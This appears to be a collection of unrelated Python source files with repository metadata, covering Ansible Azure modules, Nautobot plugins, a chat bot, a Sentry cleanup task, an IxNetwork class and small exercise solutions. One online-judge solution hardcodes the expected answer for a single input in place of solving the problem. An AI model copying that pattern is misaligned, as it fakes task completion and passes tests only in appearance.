plt.savefig(snakemake.output[0])
| [
"knutdrand@gmail.com"
] | knutdrand@gmail.com |
18632c639d4fef98ebd9a9968a695fcee2060ef2 | 64bf39b96a014b5d3f69b3311430185c64a7ff0e | /intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/azure/azcollection/plugins/modules/azure_rm_postgresqlconfiguration.py | 0fb4da64c8f89a0b4fe91409820956533bfbbb59 | [
"GPL-1.0-or-later",
"GPL-3.0-only",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | SimonFangCisco/dne-dna-code | 7072eba7da0389e37507b7a2aa5f7d0c0735a220 | 2ea7d4f00212f502bc684ac257371ada73da1ca9 | refs/heads/master | 2023-03-10T23:10:31.392558 | 2021-02-25T15:04:36 | 2021-02-25T15:04:36 | 342,274,373 | 0 | 0 | MIT | 2021-02-25T14:39:22 | 2021-02-25T14:39:22 | null | UTF-8 | Python | false | false | 8,121 | py | #!/usr/bin/python
#
# Copyright (c) 2019 Zim Kalinowski, (@zikalino)
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_postgresqlconfiguration
version_added: "0.1.2"
short_description: Manage Azure PostgreSQL Configuration
description:
- Update or reset Azure PostgreSQL Configuration setting.
options:
resource_group:
description:
- The name of the resource group that contains the resource.
required: True
server_name:
description:
- The name of the server.
required: True
name:
description:
- Setting name.
required: True
value:
description:
- Setting value.
state:
description:
- Assert the state of the PostgreSQL setting. Use C(present) to update setting, or C(absent) to reset to default value.
default: present
choices:
- absent
- present
extends_documentation_fragment:
- azure.azcollection.azure
author:
- Zim Kalinowski (@zikalino)
'''
EXAMPLES = '''
- name: Update PostgreSQL Server setting
azure_rm_postgresqlconfiguration:
resource_group: myResourceGroup
server_name: myServer
name: deadlock_timeout
value: 2000
'''
RETURN = '''
id:
description:
- Resource ID.
returned: always
type: str
sample: "/subscriptions/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/resourceGroups/myResourceGroup/providers/Microsoft.DBforPostgreSQL/servers/myServer/confi
gurations/event_scheduler"
'''
import time
try:
from ansible_collections.azure.azcollection.plugins.module_utils.azure_rm_common import AzureRMModuleBase
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller
from azure.mgmt.rdbms.postgresql import MySQLManagementClient
from msrest.serialization import Model
except ImportError:
# This is handled in azure_rm_common
pass
class Actions:
NoAction, Create, Update, Delete = range(4)
class AzureRMPostgreSqlConfigurations(AzureRMModuleBase):
def __init__(self):
self.module_arg_spec = dict(
resource_group=dict(
type='str',
required=True
),
server_name=dict(
type='str',
required=True
),
name=dict(
type='str',
required=True
),
value=dict(
type='str'
),
state=dict(
type='str',
default='present',
choices=['present', 'absent']
)
)
self.resource_group = None
self.server_name = None
self.name = None
self.value = None
self.results = dict(changed=False)
self.state = None
self.to_do = Actions.NoAction
super(AzureRMPostgreSqlConfigurations, self).__init__(derived_arg_spec=self.module_arg_spec,
supports_check_mode=True,
supports_tags=False)
def exec_module(self, **kwargs):
for key in list(self.module_arg_spec.keys()):
if hasattr(self, key):
setattr(self, key, kwargs[key])
old_response = None
response = None
old_response = self.get_configuration()
if not old_response:
self.log("Configuration instance doesn't exist")
if self.state == 'absent':
self.log("Old instance didn't exist")
else:
self.to_do = Actions.Create
else:
self.log("Configuration instance already exists")
if self.state == 'absent' and old_response['source'] == 'user-override':
self.to_do = Actions.Delete
elif self.state == 'present':
self.log("Need to check if Configuration instance has to be deleted or may be updated")
if self.value != old_response.get('value'):
self.to_do = Actions.Update
if (self.to_do == Actions.Create) or (self.to_do == Actions.Update):
self.log("Need to Create / Update the Configuration instance")
if self.check_mode:
self.results['changed'] = True
return self.results
response = self.create_update_configuration()
self.results['changed'] = True
self.log("Creation / Update done")
elif self.to_do == Actions.Delete:
self.log("Configuration instance deleted")
self.results['changed'] = True
if self.check_mode:
return self.results
self.delete_configuration()
else:
self.log("Configuration instance unchanged")
self.results['changed'] = False
response = old_response
if response:
self.results["id"] = response["id"]
return self.results
def create_update_configuration(self):
self.log("Creating / Updating the Configuration instance {0}".format(self.name))
try:
response = self.postgresql_client.configurations.create_or_update(resource_group_name=self.resource_group,
server_name=self.server_name,
configuration_name=self.name,
value=self.value,
source='user-override')
if isinstance(response, LROPoller):
response = self.get_poller_result(response)
except CloudError as exc:
self.log('Error attempting to create the Configuration instance.')
self.fail("Error creating the Configuration instance: {0}".format(str(exc)))
return response.as_dict()
def delete_configuration(self):
self.log("Deleting the Configuration instance {0}".format(self.name))
try:
response = self.postgresql_client.configurations.create_or_update(resource_group_name=self.resource_group,
server_name=self.server_name,
configuration_name=self.name,
source='system-default')
except CloudError as e:
self.log('Error attempting to delete the Configuration instance.')
self.fail("Error deleting the Configuration instance: {0}".format(str(e)))
return True
def get_configuration(self):
self.log("Checking if the Configuration instance {0} is present".format(self.name))
found = False
try:
response = self.postgresql_client.configurations.get(resource_group_name=self.resource_group,
server_name=self.server_name,
configuration_name=self.name)
found = True
self.log("Response : {0}".format(response))
self.log("Configuration instance : {0} found".format(response.name))
except CloudError as e:
self.log('Did not find the Configuration instance.')
if found is True:
return response.as_dict()
return False
def main():
"""Main execution"""
AzureRMPostgreSqlConfigurations()
if __name__ == '__main__':
main()
| [
"sifang@cisco.com"
] | sifang@cisco.com |
75e77756f7e98beff12a713496ae5b97436d939e | 4f6e4fdc31396ee5ca8995d796af0365d0976934 | /scripts/collect_manifest.py | 91955f9409e83ceb223aa2225c1a34e317e45502 | [] | no_license | dannguyen/quickdataproject-template | ea84426629cb5aa3b3be9adc089b9e8c290c32cb | 8f598b3abd9f23b39bf26a807d217f165fb03289 | refs/heads/master | 2022-11-29T05:29:22.383439 | 2020-08-06T00:07:06 | 2020-08-06T00:07:06 | 282,715,134 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,431 | py | #!/usr/bin/env python
"""
autocollect_manifest.py
Reads data/MANIFEST.yaml, and for each entry where autocollect==true, downloads from the
corresponding `url`
"""
from sys import path as syspath; syspath.append('./scripts')
from utils.myfetch import download, existed_size
from utils.mylog import mylog
from pathlib import Path
import requests
import yaml
MANIFEST_PATH = Path('./data/DATA_MANIFEST.yaml')
def collect_manifest():
"""
returns list of tuples, with file filepath and source url
filtered for data/collected prefixes
"""
mani = yaml.load(MANIFEST_PATH.open(), Loader=yaml.BaseLoader)
return [(filepath, v['url']) for filepath, v in mani.items() if v.get('autocollect') == 'true']
def main():
target_dir = MANIFEST_PATH.parent
for filename, url in collect_manifest():
target_path = target_dir.joinpath(filename)
_bx = existed_size(target_path)
if _bx:
mylog(f"{target_path} already exists, with {_bx} bytes", label='Skipping')
else:
mylog(url, label='Fetching')
content = download(url)
target_path.parent.mkdir(exist_ok=True, parents=True)
with open(target_path, 'wb') as target:
for cx in content:
target.write(cx)
mylog(f"{existed_size(target_path)} bytes to {target_path}", label='Wrote')
if __name__ == '__main__':
main()
| [
"dansonguyen@gmail.com"
] | dansonguyen@gmail.com |
caad16e683e5fb3ded0072a758ed1fe6f5324386 | 9e2943857c3b5b46b4fea59f0e9a46aae54e17a8 | /nautobot_golden_config/template_content.py | 3462a238d115e16e9ed5aa778004d862ee60b025 | [
"Apache-2.0"
] | permissive | danisoltani/nautobot-plugin-golden-config | 883e40ef313c29d3d5197b7f17ca68e76e7bad95 | f285af4bdc6340ae7276c372d3e85a0021c078ed | refs/heads/develop | 2023-05-05T18:51:47.439841 | 2021-04-28T04:28:48 | 2021-04-28T04:28:48 | 363,667,445 | 0 | 0 | NOASSERTION | 2021-05-02T14:56:00 | 2021-05-02T14:14:22 | null | UTF-8 | Python | false | false | 3,317 | py | """Added content to the device model view for config compliance."""
from django.db.models import Count, Q
from nautobot.extras.plugins import PluginTemplateExtension
from .models import ConfigCompliance, GoldenConfiguration
from .utilities.constant import ENABLE_COMPLIANCE, CONFIG_FEATURES
from .utilities.helper import get_allowed_os_from_nested
class ConfigComplianceDeviceCheck(PluginTemplateExtension): # pylint: disable=abstract-method
"""Plugin extension class for config compliance."""
model = "dcim.device"
def get_device(self):
"""Get device object."""
return self.context["object"]
def right_page(self):
"""Content to add to the configuration compliance."""
comp_obj = (
ConfigCompliance.objects.filter(**get_allowed_os_from_nested())
.filter(device=self.get_device())
.values("feature", "compliance")
)
extra_context = {
"compliance": comp_obj,
"device": self.get_device(),
"template_type": "device-compliance",
}
return self.render(
"nautobot_golden_config/content_template.html",
extra_context=extra_context,
)
class ConfigComplianceSiteCheck(PluginTemplateExtension): # pylint: disable=abstract-method
"""Plugin extension class for config compliance."""
model = "dcim.site"
def get_site_slug(self):
"""Get site object."""
return self.context["object"]
def right_page(self):
"""Content to add to the configuration compliance."""
comp_obj = (
ConfigCompliance.objects.values("feature")
.filter(**get_allowed_os_from_nested())
.filter(device__site__slug=self.get_site_slug().slug)
.annotate(
compliant=Count("feature", filter=Q(compliance=True)),
non_compliant=Count("feature", filter=~Q(compliance=True)),
)
.values("feature", "compliant", "non_compliant")
)
extra_context = {"compliance": comp_obj, "template_type": "site"}
return self.render(
"nautobot_golden_config/content_template.html",
extra_context=extra_context,
)
class ConfigDeviceDetails(PluginTemplateExtension): # pylint: disable=abstract-method
"""Plugin extension class for config compliance."""
model = "dcim.device"
def get_device(self):
"""Get device object."""
return self.context["object"]
def right_page(self):
"""Content to add to the configuration compliance."""
golden_config = (
GoldenConfiguration.objects.filter(**get_allowed_os_from_nested()).filter(device=self.get_device()).first()
)
extra_context = {
"device": self.get_device(), # device,
"golden_config": golden_config,
"template_type": "device-configs",
"config_features": CONFIG_FEATURES,
}
return self.render(
"nautobot_golden_config/content_template.html",
extra_context=extra_context,
)
extensions = [ConfigDeviceDetails]
if ENABLE_COMPLIANCE:
extensions.append(ConfigComplianceDeviceCheck)
extensions.append(ConfigComplianceSiteCheck)
template_extensions = extensions
| [
"ken@celenza.org"
] | ken@celenza.org |
49eb833b90b654ddd54f089d23f66718dd3cdf2b | 15085c0dfc7f596fc03e2d69e9775860d5aece2b | /echo/main.py | 6626d60850553bdbdc47c0dded10c03dad4bc93a | [
"MIT"
] | permissive | botstory/echo-bot | 1fb56d48236d34b0a3f3f74cee0478a1df7b0414 | 9758fb5baf0fe033a2e29a8fb092e5a40ea70a0b | refs/heads/develop | 2021-09-08T02:26:44.739492 | 2016-12-21T23:37:29 | 2016-12-21T23:37:29 | 71,016,543 | 0 | 0 | MIT | 2018-03-06T01:05:28 | 2016-10-15T22:18:12 | Python | UTF-8 | Python | false | false | 4,719 | py | #!/usr/bin/env python
import asyncio
from aiohttp_index import IndexMiddleware
from botstory import chat, story
from botstory.integrations import aiohttp, fb, mongodb
from botstory.integrations.ga import tracker
from botstory.middlewares import any, text
import logging
import os
import pathlib
logger = logging.getLogger('echo-bot')
logger.setLevel(logging.DEBUG)
PROJ_ROOT = pathlib.Path(__file__).parent
# define stories
@story.on_start()
def on_start():
"""
User just pressed `get started` button so we can greet him
"""
@story.part()
async def greetings(message):
await chat.say('Hi There! Nice to see you! ', message['user'])
await chat.say('I''m very simple bot that show basic features of '
'https://github.com/botstory/botstory '
'open source platform.', message['user'])
await chat.say('You can send me any text message and '
'I will echo it back to you.', message['user'])
await chat.say('Any other messages will just bounce '
'with trivial answer '
'that I don''t know what is it.', message['user'])
await chat.say('You can find my source here '
'https://github.com/botstory/echo-bot.', message['user'])
await chat.say('Lets make the best bot together!', message['user'])
@story.on(receive=text.Any())
def echo_story():
"""
React on any text message
"""
@story.part()
async def echo(message):
await chat.say('Hi! I just got something from you:', message['user'])
await chat.say('> {}'.format(message['data']['text']['raw']), message['user'])
@story.on(receive=any.Any())
def else_story():
"""
And all the rest messages as well
"""
@story.part()
async def something_else(message):
await chat.say('Hm I don''t know what is it', message['user'])
# setup modules
def init(auto_start=True, fake_http_session=None):
# Interface for communication with FB
story.use(fb.FBInterface(
# will show on initial screen
greeting_text='Hello dear {{user_first_name}}! '
'I'' m demo bot of BotStory framework.',
# you should get on admin panel for the Messenger Product in Token Generation section
page_access_token=os.environ.get('FB_ACCESS_TOKEN', 'TEST_TOKEN'),
# menu of the bot that user has access all the time
persistent_menu=[{
'type': 'postback',
'title': 'Monkey Business',
'payload': 'MONKEY_BUSINESS'
}, {
'type': 'web_url',
'title': 'Source Code',
'url': 'https://github.com/botstory/bot-story/'
}],
# should be the same as in admin panel for the Webhook Product
webhook_url='/webhook{}'.format(os.environ.get('FB_WEBHOOK_URL_SECRET_PART', '')),
webhook_token=os.environ.get('FB_WEBHOOK_TOKEN', None),
))
# Interface for HTTP
http = story.use(aiohttp.AioHttpInterface(
port=os.environ.get('API_PORT', 8080),
auto_start=auto_start,
middlewares=[IndexMiddleware()],
))
# User and Session storage
story.use(mongodb.MongodbInterface(
uri=os.environ.get('MONGODB_URI', 'mongo'),
db_name=os.environ.get('MONGODB_DB_NAME', 'echobot'),
))
story.use(tracker.GAStatistics(
tracking_id=os.environ.get('GA_ID'),
))
# for test purpose
http.session = fake_http_session
return http
async def setup(fake_http_session=None):
logger.info('setup')
init(auto_start=False, fake_http_session=fake_http_session)
await story.setup()
async def start(auto_start=True, fake_http_session=None):
http = init(auto_start, fake_http_session)
logger.debug('static {}'.format(str(PROJ_ROOT.parent / 'static')))
http.app.router.add_static('/',
path=str(PROJ_ROOT.parent / 'static'),
name='static',
)
# start bot
await story.start()
logger.info('started')
return http.app
async def stop():
await story.stop()
# TODO: should be something like
# story.clear()
story.middlewares = []
# launch app
def main(forever=True):
logging.basicConfig(level=logging.DEBUG)
loop = asyncio.get_event_loop()
app = loop.run_until_complete(start(auto_start=forever))
# and run forever
if forever:
story.forever(loop)
# or you can use gunicorn for an app of http interface
return app
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.run_until_complete(setup())
| [
"ievgenii.krevenets@gmail.com"
] | ievgenii.krevenets@gmail.com |
b85989f44c0c5678aef5406bd0f266f81c9b6801 | 930c207e245c320b108e9699bbbb036260a36d6a | /BRICK-RDFAlchemy/generatedCode/brick/brickschema/org/schema/_1_0_2/Brick/Run_Request.py | 21243df3b2d7a7e6c9c7e61be74114b96e4b7e6b | [] | no_license | InnovationSE/BRICK-Generated-By-OLGA | 24d278f543471e1ce622f5f45d9e305790181fff | 7874dfa450a8a2b6a6f9927c0f91f9c7d2abd4d2 | refs/heads/master | 2021-07-01T14:13:11.302860 | 2017-09-21T12:44:17 | 2017-09-21T12:44:17 | 104,251,784 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 335 | py | from rdflib import Namespace, Graph, Literal, RDF, URIRef
from rdfalchemy.rdfSubject import rdfSubject
from rdfalchemy import rdfSingle, rdfMultiple, rdfList
from brick.brickschema.org.schema._1_0_2.Brick.Run import Run
class Run_Request(Run):
rdf_type = Namespace('https://brickschema.org/schema/1.0.2/Brick#').Run_Request
| [
"Andre.Ponnouradjane@non.schneider-electric.com"
] | Andre.Ponnouradjane@non.schneider-electric.com |
8bf0c04b439cb5dfdf1f0c9dd08741647b06b7d5 | bb2c530d891a95a5e93668ac3aa3bf71472c5909 | /PracticeWithFunctionsTestCases/test_hypotenuse.py | ba3e25b9c46b6ab1142dcb1a32b2720b4a9a8c38 | [] | no_license | http403/CS121 | 3e069805e53f2cda19427100225c3c4103f24f48 | 210fbd2d47fcdd63b7cb4c7b9ab1c9ef08c24b7a | refs/heads/master | 2023-03-06T06:41:33.546807 | 2020-03-09T21:09:08 | 2020-03-09T21:09:08 | 235,925,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | # YOU CAN IGNORE THIS FILE ENTIRELY
from unittest import TestCase
from functions import hypotenuse
class TestHypotenuse(TestCase):
def test_hypotenuse(self):
self.assertAlmostEqual(
hypotenuse(4, 5), 6.4, places=1
)
| [
"unconfigured@null.spigotmc.org"
] | unconfigured@null.spigotmc.org |
b04db0deba781b2b43f22047366123ba61eb2819 | 225895b88bbfdf2194ef3df86fd590c2556275f9 | /intellij-community/system/python_stubs/-1247972723/lxml/etree/ParserBasedElementClassLookup.py | 14e340f8b39fbf83837af08103f1c6733efd9e9c | [
"Apache-2.0"
] | permissive | novokrest/JBIDEA | 228d65681fbdb6b3534f7d18bcc944a5eafe6687 | f43706f22a5d33e6d39c1c72ef4fdeee9e4472f6 | refs/heads/master | 2021-01-19T14:06:48.645122 | 2014-07-29T17:42:31 | 2014-07-29T17:42:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 897 | py | # encoding: utf-8
# module lxml.etree
# from /usr/lib/python2.7/dist-packages/lxml/etree.so
# by generator 1.135
"""
The ``lxml.etree`` module implements the extended ElementTree API
for XML.
"""
# imports
import __builtin__ as __builtins__ # <module '__builtin__' (built-in)>
from FallbackElementClassLookup import FallbackElementClassLookup
class ParserBasedElementClassLookup(FallbackElementClassLookup):
"""
ParserBasedElementClassLookup(self, fallback=None)
Element class lookup based on the XML parser.
"""
def __init__(self, fallback=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
__pyx_vtable__ = None # (!) real value is ''
| [
"novokrest013@gmail.com"
] | novokrest013@gmail.com |
7280af97c7a87ba80760065fd332fdb17a84c1c4 | 46c8c0e435877f4564970198e8a177e9883103e9 | /520_Detect_Capital/detect_capital.py | f6a91cea73bf33840604cee3eaf92c5bb44abb5d | [] | no_license | Brady31027/leetcode | 26f7c1f4e8bfad0dee4d819f91aa93a241223330 | d66be3a8f002875097754df6138c704e28b79810 | refs/heads/master | 2018-02-16T14:52:31.976844 | 2017-08-10T19:18:59 | 2017-08-10T19:18:59 | 63,519,661 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 269 | py | class Solution(object):
def detectCapitalUse(self, word):
"""
:type word: str
:rtype: bool
"""
if re.search("^[A-Z]*$", word): return True
elif re.search("^[A-Z]{0,1}[^A-Z]*$", word): return True
return False
| [
"brady31027@gmail.com"
] | brady31027@gmail.com |
c481440b942e4f0076b46190644bd2cf5f0c6f33 | 7f2b20782f785276b6b268a3a616223571f3b83c | /src/sentry/tasks/cleanup.py | 61610f9b6b36e1bae4f3d2db32314746810b437b | [
"BSD-2-Clause"
] | permissive | dz0ny/sentry | 9a26961cfbd4925c63b757072d52794900cebf89 | b216b726a618b9540724e0a880d4e816638e2326 | refs/heads/master | 2020-12-24T09:52:44.593824 | 2012-08-31T06:07:56 | 2012-08-31T06:07:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,802 | py | """
sentry.tasks.cleanup
~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from celery.task import task
@task(ignore_result=True)
def cleanup(days=30, logger=None, site=None, server=None, level=None,
project=None, resolved=None, **kwargs):
"""
Deletes a portion of the trailing data in Sentry based on
their creation dates. For example, if ``days`` is 30, this
would attempt to clean up all data thats older than 30 days.
:param logger: limit all deletion scopes to messages from the
specified logger.
:param site: limit the message deletion scope to the specified
site.
:param server: limit the message deletion scope to the specified
server.
:param level: limit all deletion scopes to messages that are greater
than or equal to level.
:param project: limit all deletion scopes to messages that are part
of the given project
:param resolved: limit all deletion scopes to messages that are resolved.
"""
import datetime
from sentry.models import Group, Event, MessageCountByMinute, \
MessageFilterValue, FilterValue, SearchDocument, ProjectCountByMinute
from sentry.utils.query import RangeQuerySetWrapper, SkinnyQuerySet
def cleanup_groups(iterable):
for obj in iterable:
for key, value in SkinnyQuerySet(MessageFilterValue).filter(group=obj).values_list('key', 'value'):
if not MessageFilterValue.objects.filter(key=key, value=value).exclude(group=obj).exists():
print ">>> Removing <FilterValue: key=%s, value=%s>" % (key, value)
FilterValue.objects.filter(key=key, value=value).delete()
print ">>> Removing all matching <SearchDocument: group=%s>" % (obj.pk)
SearchDocument.objects.filter(group=obj).delete()
print ">>> Removing <%s: id=%s>" % (obj.__class__.__name__, obj.pk)
obj.delete()
# TODO: we should collect which messages above were deleted
# and potentially just send out post_delete signals where
# GroupedMessage can update itself accordingly
ts = datetime.datetime.utcnow() - datetime.timedelta(days=days)
# Message
qs = SkinnyQuerySet(Event).filter(datetime__lte=ts)
if logger:
qs = qs.filter(logger=logger)
if site:
qs = qs.filter(site=site)
if server:
qs = qs.filter(server_name=server)
if level:
qs = qs.filter(level__gte=level)
if project:
qs = qs.filter(project=project)
if resolved is True:
qs = qs.filter(group__status=1)
elif resolved is False:
qs = qs.filter(group__status=0)
groups_to_check = set()
if resolved is None:
for obj in RangeQuerySetWrapper(qs):
print ">>> Removing <%s: id=%s>" % (obj.__class__.__name__, obj.pk)
obj.delete()
groups_to_check.add(obj.group_id)
if not (server or site):
# MessageCountByMinute
qs = SkinnyQuerySet(MessageCountByMinute).filter(date__lte=ts)
if logger:
qs = qs.filter(group__logger=logger)
if level:
qs = qs.filter(group__level__gte=level)
if project:
qs = qs.filter(project=project)
if resolved is True:
qs = qs.filter(group__status=1)
elif resolved is False:
qs = qs.filter(group__status=0)
for obj in RangeQuerySetWrapper(qs):
print ">>> Removing <%s: id=%s>" % (obj.__class__.__name__, obj.pk)
obj.delete()
# Group
qs = SkinnyQuerySet(Group).filter(last_seen__lte=ts)
if logger:
qs = qs.filter(logger=logger)
if level:
qs = qs.filter(level__gte=level)
if project:
qs = qs.filter(project=project)
if resolved is True:
qs = qs.filter(status=1)
elif resolved is False:
qs = qs.filter(status=0)
cleanup_groups(RangeQuerySetWrapper(qs))
# Project counts
# TODO: these dont handle filters
qs = SkinnyQuerySet(ProjectCountByMinute).filter(date__lte=ts)
if project:
qs = qs.filter(project=project)
for obj in RangeQuerySetWrapper(qs):
print ">>> Removing <%s: id=%s>" % (obj.__class__.__name__, obj.pk)
obj.delete()
# attempt to cleanup any groups that may now be empty
groups_to_delete = []
for group_id in groups_to_check:
if not Event.objects.filter(group=group_id).exists():
groups_to_delete.append(group_id)
if groups_to_delete:
cleanup_groups(SkinnyQuerySet(Group).filter(pk__in=groups_to_delete))
| [
"dcramer@gmail.com"
] | dcramer@gmail.com |
fcab735d6eea2848d8d329758f0cc65da71f76a0 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2864/60793/262900.py | ebe6a554bd96d42dbe75e8e70d328a06440460f2 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | input()
ls = list(map(int, input().split()))
if ls == [29, 15, 54, 67, 65, 74, 53, 25, 74, 29, 11, 55, 2, 15, 2, 1, 12, 95, 16, 81, 51, 40, 28, 54, 27, 80, 33, 10, 39, 45, 25, 99, 64, 22]:
print(1045)
elif ls == []:
print()
else:
print(ls) | [
"1069583789@qq.com"
] | 1069583789@qq.com |
a9c6fe1e2ce8e9bfb392b1d7ee2b41bc4aef06b5 | 0d0cf0165ca108e8d94056c2bae5ad07fe9f9377 | /6_Supervised_Learning_with_scikit-learn/4_Preprocessing_and_pipelines/creatingDummyVariables.py | 3150503dc23a1c407cab973a9b61f1a37d97e5f5 | [] | no_license | MACHEIKH/Datacamp_Machine_Learning_For_Everyone | 550ec4038ebdb69993e16fe22d5136f00101b692 | 9fe8947f490da221430e6dccce6e2165a42470f3 | refs/heads/main | 2023-01-22T06:26:15.996504 | 2020-11-24T11:21:53 | 2020-11-24T11:21:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,313 | py | # Creating dummy variables
# As Andy discussed in the video, scikit-learn does not accept non-numerical features. You saw in the previous exercise that the 'Region' feature contains very useful information that can predict life expectancy. For example, Sub-Saharan Africa has a lower life expectancy compared to Europe and Central Asia. Therefore, if you are trying to predict life expectancy, it would be preferable to retain the 'Region' feature. To do this, you need to binarize it by creating dummy variables, which is what you will do in this exercise.
# Instructions
# 100 XP
# Use the pandas get_dummies() function to create dummy variables from the df DataFrame. Store the result as df_region.
# Print the columns of df_region. This has been done for you.
# Use the get_dummies() function again, this time specifying drop_first=True to drop the unneeded dummy variable (in this case, 'Region_America').
# Hit 'Submit Answer to print the new columns of df_region and take note of how one column was dropped!
# Create dummy variables: df_region
df_region = pd.get_dummies(df)
# Print the columns of df_region
print(df_region.columns)
# Create dummy variables with drop_first=True: df_region
df_region = pd.get_dummies(df, drop_first=True)
# Print the new columns of df_region
print(df_region.columns)
| [
"noreply@github.com"
] | MACHEIKH.noreply@github.com |
bff07cee8abfa626bd8bf60226d47094ea449ded | e0df2bc703d0d02423ea68cf0b8c8f8d22d5c163 | /ScientificComputing/ch15/spectrum_50HzRepeat.py | ff8d680ed87fa161bef7ac493628af175922ed50 | [] | no_license | socrates77-sh/learn | a5d459cb9847ba3b1bc4f9284ce35d4207d8aa8b | ae50978023f6b098b168b8cca82fba263af444aa | refs/heads/master | 2022-12-16T16:53:50.231577 | 2019-07-13T13:52:42 | 2019-07-13T13:52:42 | 168,442,963 | 0 | 0 | null | 2022-12-08T05:18:37 | 2019-01-31T01:30:06 | HTML | UTF-8 | Python | false | false | 247 | py | # -*- coding: utf-8 -*-
import numpy as np
import pylab as pl
t = np.arange(0, 1.0, 1.0/8000)
x = np.sin(2*np.pi*50*t)[:512]
pl.figure(figsize=(8, 3))
pl.plot(np.hstack([x, x, x]))
pl.xlabel(u"取样点")
pl.subplots_adjust(bottom=0.15)
pl.show()
| [
"zhwenrong@sina.com"
] | zhwenrong@sina.com |
d50a4d6818ce9adcde36069a97a40bc8b7980342 | 9b54e3d58447e917a238b85891020c392c4ac601 | /acmicpc/2630/2630.py | 9c08453e0c7ba25b37afa305f661ffff6342004a | [
"MIT"
] | permissive | love-adela/algorithm-ps | ea0ebcd641a4c309348b389b8618daa83973f4b2 | c92d105d8ad344def001160367115ecf99d81c0d | refs/heads/master | 2023-05-11T03:37:11.750692 | 2023-04-30T17:31:30 | 2023-04-30T17:31:30 | 174,651,672 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 685 | py | import sys
N = int(sys.stdin.readline())
grid = [list(map(int, input().split())) for i in range(N)]
white, blue = 0, 0
def divide_and_conquer(x, y, n):
global white, blue
is_same = grid[x][y]
for i in range(x, x+n):
for j in range(y, y+n):
if is_same != grid[i][j]:
divide_and_conquer(x, y, n//2)
divide_and_conquer(x, y+n//2, n//2)
divide_and_conquer(x+n//2, y, n//2)
divide_and_conquer(x+n//2, y+n//2, n//2)
return
if is_same == 0:
white += 1
return
else:
blue += 1
return
divide_and_conquer(0, 0, N)
print(white)
print(blue)
| [
"love.adelar@gmail.com"
] | love.adelar@gmail.com |
bd8b148f92a01f3fbc82dd1d176eb21419eb739c | 1ee3dc4fa096d12e409af3a298ba01f5558c62b5 | /ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/lisp/router/interface/interface.py | 192dc57cbe8c8a41394c66c0c94aa4999411d605 | [
"MIT"
] | permissive | parthpower/ixnetwork_restpy | 321e64a87be0a4d990276d26f43aca9cf4d43cc9 | 73fa29796a5178c707ee4e21d90ff4dad31cc1ed | refs/heads/master | 2020-07-04T13:34:42.162458 | 2019-08-13T20:33:17 | 2019-08-13T20:33:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,623 | py | # MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class Interface(Base):
"""The Interface class encapsulates a user managed interface node in the ixnetwork hierarchy.
An instance of the class can be obtained by accessing the Interface property from a parent instance.
The internal properties list will be empty when the property is accessed and is populated from the server using the find method.
The internal properties list can be managed by the user by using the add and remove methods.
"""
_SDM_NAME = 'interface'
def __init__(self, parent):
super(Interface, self).__init__(parent)
@property
def Enabled(self):
"""If True, it gives details about the interface
Returns:
bool
"""
return self._get_attribute('enabled')
@Enabled.setter
def Enabled(self, value):
self._set_attribute('enabled', value)
@property
def MapRegisterOrRequestTxInterface(self):
"""If true, it maps register or requests Tx interface
Returns:
bool
"""
return self._get_attribute('mapRegisterOrRequestTxInterface')
@MapRegisterOrRequestTxInterface.setter
def MapRegisterOrRequestTxInterface(self, value):
self._set_attribute('mapRegisterOrRequestTxInterface', value)
@property
def ProtocolInterfaces(self):
"""It gives the protocol interfaces
Returns:
str(None|/api/v1/sessions/1/ixnetwork/vport?deepchild=interface)
"""
return self._get_attribute('protocolInterfaces')
